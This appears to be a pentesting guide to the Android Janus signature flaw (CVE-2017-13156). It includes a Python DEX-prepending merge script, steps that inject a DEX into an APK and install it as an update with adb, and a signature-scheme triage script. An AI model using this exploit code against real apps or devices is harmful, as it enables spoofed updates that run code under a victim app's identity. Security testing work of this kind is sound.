
# Janus Vulnerability (CVE-2017-13156)

## What Is the Janus Vulnerability

Janus (CVE-2017-13156) is a flaw in how Android 5.x to 8.0 verify APK signatures. An APK is a ZIP archive, which is parsed from its end-of-central-directory record, while a DEX file is recognised by the magic bytes at the very start of a file. An attacker can therefore prepend a DEX file to a signed APK and obtain a single file that is simultaneously a valid DEX and a valid ZIP. The v1 (JAR) signature scheme only digests the individual ZIP entries, so the prepended bytes are not covered and the signature still verifies; the runtime, however, sees the DEX header first and loads the attacker's code. The result is that a modified app can be installed as an update to the legitimate one, inheriting its identity and permissions, without the attacker knowing the signing key.

## Details

1. Android 5.x and 6.x only know the v1 (JAR) signature scheme, so every APK is verified with v1 there. Google fixed the verification logic in the December 2017 Android Security Bulletin (security patch level 2017-12-01). A 5.x or 6.x device carrying that patch level or later cannot be exploited, whichever schemes the APK is signed with.
2. APK Signature Scheme v2 was introduced in Android 7.0, before Janus was disclosed. v2 covers the whole file, so a 7.x or 8.0 device that finds a v2 signature verifies that one and rejects the prepended DEX. An APK signed only with v1, however, is still verified with v1 on 7.x and 8.0, so those versions are exploitable as long as the 2017-12-01 patch is missing. Android 8.1 and later ship with the fix.
3. Applications signed with v2 or v3 in addition to v1 remain vulnerable when installed on unpatched 5.x and 6.x devices, because those versions ignore the v2/v3 signatures and verify only v1.
4. Android 11 introduced the v4 scheme and requires apps that target API level 30 or higher to carry a v2 or newer signature; a v1-only APK that targets API 30+ will not install on Android 11. v1 itself has not been removed, since it is still the only scheme pre-7.0 devices understand.
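The mechanism above, as an added self-contained example (not the page's code and not V-E-O's PoC): it builds a constructed "APK" (a plain ZIP standing in for a v1-signed one) and a constructed header-shaped "DEX" (not loadable bytecode), prepends the DEX, repairs the ZIP offsets and the DEX header fields the way a Janus merge must, and then shows why a v1 signature keeps verifying: the per-entry digests are identical before and after. `looks_like_janus` is the triage check a practitioner would apply to a suspicious APK.

```python
"""Janus merge on constructed in-memory inputs (added example, see lead-in)."""
import hashlib
import io
import struct
import zipfile
import zlib

DEX_MAGIC = b"dex\n035\0"
EOCD_SIG = b"PK\x05\x06"   # ZIP end-of-central-directory record
CDFH_SIG = b"PK\x01\x02"   # ZIP central-directory file header


def fix_dex_header(data: bytes) -> bytes:
    """Recompute the DEX header fields that depend on the whole file:
    file_size (offset 32), SHA-1 signature (offset 12, over bytes 32..end)
    and adler32 checksum (offset 8, over bytes 12..end)."""
    buf = bytearray(data)
    buf[32:36] = struct.pack("<I", len(buf))
    buf[12:32] = hashlib.sha1(bytes(buf[32:])).digest()
    buf[8:12] = struct.pack("<I", zlib.adler32(bytes(buf[12:])) & 0xFFFFFFFF)
    return bytes(buf)


def dex_header_ok(data: bytes) -> bool:
    """True if magic, file_size, signature and checksum all match the bytes."""
    size = struct.unpack_from("<I", data, 32)[0]
    checksum = struct.unpack_from("<I", data, 8)[0]
    return (data[:8] == DEX_MAGIC and size == len(data)
            and data[12:32] == hashlib.sha1(data[32:]).digest()
            and checksum == (zlib.adler32(data[12:]) & 0xFFFFFFFF))


def build_fake_dex(payload: bytes) -> bytes:
    """Constructed stand-in for the attacker's classes.dex: a 0x70-byte header
    (magic, header_size, endian_tag, all else zero) plus payload bytes."""
    hdr = bytearray(0x70)
    hdr[0:8] = DEX_MAGIC
    struct.pack_into("<I", hdr, 36, 0x70)        # header_size
    struct.pack_into("<I", hdr, 40, 0x12345678)  # endian_tag
    return fix_dex_header(bytes(hdr) + payload)


def build_apk(entries: dict) -> bytes:
    """Constructed stand-in for a v1-signed APK: a plain ZIP of name -> bytes."""
    bio = io.BytesIO()
    with zipfile.ZipFile(bio, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, content in entries.items():
            zf.writestr(name, content)
    return bio.getvalue()


def janus_merge(dex: bytes, apk: bytes) -> bytes:
    """Prepend dex to apk and shift every ZIP offset by len(dex): the EOCD's
    central-directory offset and each entry's local-header offset.  The result
    parses as a DEX from byte 0 and as a ZIP from its tail."""
    shift = len(dex)
    buf = bytearray(apk)
    eocd = buf.rfind(EOCD_SIG)
    if eocd < 0:
        raise ValueError("no end-of-central-directory record: not a ZIP")
    cd_size, cd_off = struct.unpack_from("<II", buf, eocd + 12)
    struct.pack_into("<I", buf, eocd + 16, cd_off + shift)
    pos = cd_off
    while pos < cd_off + cd_size:
        if buf[pos:pos + 4] != CDFH_SIG:
            raise ValueError("central directory out of sync at %d" % pos)
        name_len, extra_len, comment_len = struct.unpack_from("<HHH", buf, pos + 28)
        lfh_off = struct.unpack_from("<I", buf, pos + 42)[0]
        struct.pack_into("<I", buf, pos + 42, lfh_off + shift)
        pos += 46 + name_len + extra_len + comment_len
    # The DEX header now describes the whole file, so size and digests change.
    return fix_dex_header(dex + bytes(buf))


def entry_digests(data: bytes) -> dict:
    """SHA-256 of every ZIP entry's content, the kind of per-entry digest a
    v1 (JAR) signature covers.  Bytes outside the entries are never hashed."""
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        return {n: hashlib.sha256(zf.read(n)).hexdigest() for n in zf.namelist()}


def looks_like_janus(data: bytes) -> bool:
    """Triage: DEX magic at byte 0 but a ZIP EOCD record at the tail."""
    return data.startswith(DEX_MAGIC) and data.rfind(EOCD_SIG) > 0


def demo():
    """Constructed victim APK and its Janus-merged counterpart."""
    apk = build_apk({"classes.dex": b"legitimate bytecode",
                     "META-INF/MANIFEST.MF": b"Manifest-Version: 1.0\n"})
    return apk, janus_merge(build_fake_dex(b"attacker bytecode"), apk)


if __name__ == "__main__":
    original, merged = demo()
    print("DEX header consistent:", dex_header_ok(merged))
    print("Janus shape:", looks_like_janus(merged))
    print("v1-covered digests unchanged:", entry_digests(original) == entry_digests(merged))
```

The equality of `entry_digests` before and after the merge is the whole vulnerability in one line: a v1 verifier compares exactly these digests and never looks at the bytes in front of the first local file header. A v2 verifier, which digests the file as a whole, would fail on the same input.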

## How to Test

* [ ] Use [apksigner](https://medium.com/mobis3c/setting-up-an-android-pentesting-environment-29991aa0c3f1#46c8) to list the signature schemes the application carries; the verbose output reports separately whether v1, v2 and v3 signatures are present and verify

```bash
apksigner verify --verbose h5.apk
```

<figure><img src="/files/KSgMwxngZL1JbaLyqpfS" alt=""><figcaption><p>apk has been signed only with v1, no v2 or v3 signature</p></figcaption></figure>

* [ ] Use [apktool](https://medium.com/mobis3c/setting-up-an-android-pentesting-environment-29991aa0c3f1#37de) to find the minimum Android version the application can run on (`minSdkVersion` in `apktool.yml`); Janus needs the APK to be installable on a 5.x to 8.0 device

```bash
apktool -s d h5.apk && grep minSdk h5/apktool.yml
```

<figure><img src="/files/NpwEafENts1IUaNfN9W8" alt=""><figcaption><p>Application can be run on API Level 15 (Android 4.0.4 Ice Cream Sandwich), so we can choose any device from <strong>5.x, 6.x, 7.x &amp; 8.0</strong> to exploit it.</p></figcaption></figure>

* [ ] Get a `classes.dex` from any other APK; this is the code that will run under the victim app's identity (`-s` keeps the DEX instead of decoding it to smali)

```bash
apktool -s d WhatsApp.apk && mv WhatsApp/classes.dex .
```

* [ ] To inject this `classes.dex` into the h5 application, use the exploit script from [**V-E-O**'s PoC repo](https://raw.githubusercontent.com/V-E-O/PoC/master/CVE-2017-13156/janus.py). Save it as **janus.py**; it takes the DEX, the original APK and the output path, prepends the DEX, fixes up the ZIP offsets and rewrites the DEX header checksum and signature

```bash
python janus.py classes.dex h5.apk kal-h5.apk
```

<figure><img src="/files/92kog8dtAAbyE7rbbeac" alt=""><figcaption></figcaption></figure>

* [ ] Confirm the target device is exploitable (Android 5.x to 8.0 with a security patch level earlier than 2017-12-01), install the original app, then install the Janus-modified APK over it as an update. The update is accepted because the v1 signature still verifies, and the injected DEX is what the runtime loads

```bash
adb shell getprop ro.build.version.security_patch   # must be older than 2017-12-01
adb install h5.apk
adb install -r kal-h5.apk
```
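The first two steps (which schemes the APK carries, and which device versions it can be installed on) can also be answered from the ZIP structure alone. The block below is an added example, not the page's code and not apksigner: `signature_schemes` reports v1 from the `META-INF/*.SF` plus `.RSA`/`.DSA`/`.EC` entries and v2/v3 from the block IDs in the APK Signing Block that sits just before the central directory, and `exposed_api_levels` encodes the version table from the Details section for devices that lack the 2017-12-01 patch. It only detects presence; verifying the signatures is still apksigner's job. The test inputs are constructed in memory with dummy signature bytes, and the `min_sdk` argument is assumed to come from `apktool.yml`.

```python
"""Signature-scheme triage from ZIP structure (added example, see lead-in)."""
import io
import struct
import zipfile

EOCD_SIG = b"PK\x05\x06"
SIG_BLOCK_MAGIC = b"APK Sig Block 42"
# Block IDs from the APK Signing Block format; v4 lives in a separate .idsig file.
BLOCK_IDS = {0x7109871A: "v2", 0xF05368C0: "v3", 0x1B93AD61: "v3.1"}
CERT_EXTS = ("RSA", "DSA", "EC")


def central_directory_offset(data):
    """(EOCD position, central-directory offset) read from the EOCD record."""
    eocd = data.rfind(EOCD_SIG)
    if eocd < 0:
        raise ValueError("not a ZIP: no end-of-central-directory record")
    return eocd, struct.unpack_from("<I", data, eocd + 16)[0]


def signing_block_ids(data: bytes) -> list:
    """Block IDs of the id-value pairs in the APK Signing Block, [] if absent.
    Layout: u64 size (excluding itself) | pairs (u64 len, u32 id, value) |
    u64 size | 16-byte magic; the block ends where the central directory starts."""
    _, cd_off = central_directory_offset(data)
    if data[cd_off - 16:cd_off] != SIG_BLOCK_MAGIC:
        return []
    size = struct.unpack_from("<Q", data, cd_off - 24)[0]
    pos, end = cd_off - size, cd_off - 24      # first pair .. trailing size field
    ids = []
    while pos < end:
        length, block_id = struct.unpack_from("<QI", data, pos)
        ids.append(block_id)
        pos += 8 + length
    return ids


def signature_schemes(data: bytes) -> set:
    """Which schemes the APK carries (presence only, no verification)."""
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        meta = [n for n in zf.namelist() if n.startswith("META-INF/")]
    schemes = set()
    if any(n.endswith(".SF") for n in meta) and \
       any(n.rsplit(".", 1)[-1] in CERT_EXTS for n in meta):
        schemes.add("v1")
    schemes.update(BLOCK_IDS[b] for b in signing_block_ids(data) if b in BLOCK_IDS)
    return schemes


def exposed_api_levels(schemes: set, min_sdk: int) -> list:
    """API levels of devices WITHOUT the 2017-12-01 patch on which an update
    to this APK could be spoofed.  21-23 (Android 5.x/6.x) only know v1, so a
    v1 signature is enough; 24-26 (7.x/8.0) honour v2+ when present, so only
    v1-only APKs are exposed there.  Devices below min_sdk cannot install it."""
    if "v1" not in schemes:
        return []    # no v1: does not install on 5.x/6.x, and 7.0+ verifies v2+
    top = 23 if schemes & {"v2", "v3", "v3.1"} else 26
    return [lvl for lvl in range(21, top + 1) if lvl >= min_sdk]


def build_apk(entries: dict, block_ids=()) -> bytes:
    """Constructed test input: a ZIP, optionally with an APK Signing Block
    (dummy 32-byte values under the given IDs) spliced in before the central
    directory.  Nothing in it is a real signature."""
    bio = io.BytesIO()
    with zipfile.ZipFile(bio, "w") as zf:
        for name, content in entries.items():
            zf.writestr(name, content)
    data = bytearray(bio.getvalue())
    if not block_ids:
        return bytes(data)
    pairs = b"".join(struct.pack("<QI", 4 + 32, bid) + b"\0" * 32 for bid in block_ids)
    size = len(pairs) + 8 + 16                  # pairs + trailing size + magic
    block = struct.pack("<Q", size) + pairs + struct.pack("<Q", size) + SIG_BLOCK_MAGIC
    eocd, cd_off = central_directory_offset(data)
    struct.pack_into("<I", data, eocd + 16, cd_off + len(block))
    return bytes(data[:cd_off]) + block + bytes(data[cd_off:])


if __name__ == "__main__":
    v1_only = build_apk({"classes.dex": b"code", "META-INF/MANIFEST.MF": b"m",
                         "META-INF/CERT.SF": b"s", "META-INF/CERT.RSA": b"r"})
    print(signature_schemes(v1_only), exposed_api_levels(signature_schemes(v1_only), 15))
```

Reading the signing block rather than trusting the file extension matters in the field: a v1-only APK that installs on an unpatched 7.x or 8.0 device is the interesting case, while the same APK carrying a v2 signature is only exposed on 5.x/6.x, which is exactly what the two-step check with apksigner and apktool establishes.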

## Automation

{% embed url="<https://github.com/h0tak88r/j88nx>" %}

```bash
# Basic APK analysis
go run main.go -apk path/to/your.apk

# Analysis with custom POC dex file
go run main.go -apk path/to/your.apk -dex path/to/poc.dex
```

## Resources

{% embed url="<https://medium.com/mobis3c/exploiting-apps-vulnerable-to-janus-cve-2017-13156-8d52c983b4e0>" %}
